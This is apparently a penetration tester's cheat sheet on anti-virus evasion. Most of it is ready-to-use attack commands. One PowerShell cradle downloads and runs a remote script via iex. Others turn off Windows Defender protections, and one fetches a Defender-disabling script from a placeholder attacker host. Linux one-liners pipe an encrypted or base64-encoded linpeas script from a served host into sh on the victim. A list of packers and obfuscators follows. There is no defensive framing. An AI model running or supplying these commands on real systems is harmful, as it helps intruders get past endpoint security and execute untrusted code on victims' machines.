Anti-Virus Evasion Techniques
Windows
- Download and execute via Invoke expression:
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://bit.ly/1kEgbuH')" - Get the installed AV Product:
Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct - Disable AV:
Set-MpPreference -DisableRealtimeMonitoring $true -DisableBehaviorMonitoring $true -DisableBlockAtFirstSeen $true -DisableIOAVProtection $true -DisablePrivacyMode $true -SignatureDisableUpdateOnStartupWithoutEngine $true -DisableArchiveScanning $true -DisableIntrusionPreventionSystem $true -DisableScriptScanning $true -DisableRemovableDriveScanning $true -SubmitSamplesConsent 2 -MAPSReporting 0 -HighThreatDefaultAction 6 -Force -ModerateThreatDefaultAction 6 -LowThreatDefaultAction 6 -SevereThreatDefaultAction 6 - If that doesn’t work use this script to disable Defender:
- Warning! Will reboot the target!
- disable-defender.ps1
Invoke-WebRequest -Uri http://{LHOST}:{LPORT}/disable-defender.ps1 -OutFile disable-defender.ps1.\disable-defender.ps1 -Delete
- Windows Command-Line Obfuscation
- AMSI.fail
Linux
#open-ssl encryption
openssl enc -aes-256-cbc -pbkdf2 -salt -pass pass:AVBypassWithAES -in linpeas.sh -out lp.enc
sudo python -m SimpleHTTPServer 80 #Start HTTP server
curl 10.10.10.10/lp.enc | openssl enc -aes-256-cbc -pbkdf2 -d -pass pass:AVBypassWithAES | sh #Download from the victim
#Base64 encoded
base64 -w0 linpeas.sh > lp.enc
sudo python -m SimpleHTTPServer 80 #Start HTTP server
curl 10.10.10.10/lp.enc | base64 -d | sh #Download from the victim
To explore
- ProtectMyTooling: Multi-Packer wrapper letting us daisy-chain various packers, obfuscators and other Red Team oriented weaponry
- PEzor: Open-Source Shellcode & PE Packer
- amber: Reflective PE packer.
- GitHub - scrt/avcleaner: C/C++ source obfuscator for antivirus bypass
- peekaboo: Simple undetectable shellcode and code injector launcher example. Inspired by RTO malware development course.
- SharpCradle
- SharpNoPSExec: Get file less command execution for lateral movement.
- InvisibilityCloak: Proof-of-concept obfuscation toolkit for C# post-exploitation tools
- GitHub - LuemmelSec/Pentest-Tools-Collection
- awesome-executable-packing: A curated list of awesome resources related to executable packing
- A blueprint for evading industry leading endpoint protection in 2022 | Vincent Van Mieghem
- RoseSecurity/Anti-Virus-Evading-Payloads
- GitHub - rasta-mouse/ThreatCheck: Identifies the bytes that Microsoft Defender / AMSI Consumer flags on.
- GitHub - sinfulz/JustEvadeBro: JustEvadeBro, a cheat sheet which will aid you through AMSI/AV evasion & bypasses.
- GitHub - CMEPW/BypassAV: This map lists the essential techniques to bypass anti-virus and EDR
Relevant Note(s): Antivirus Evasion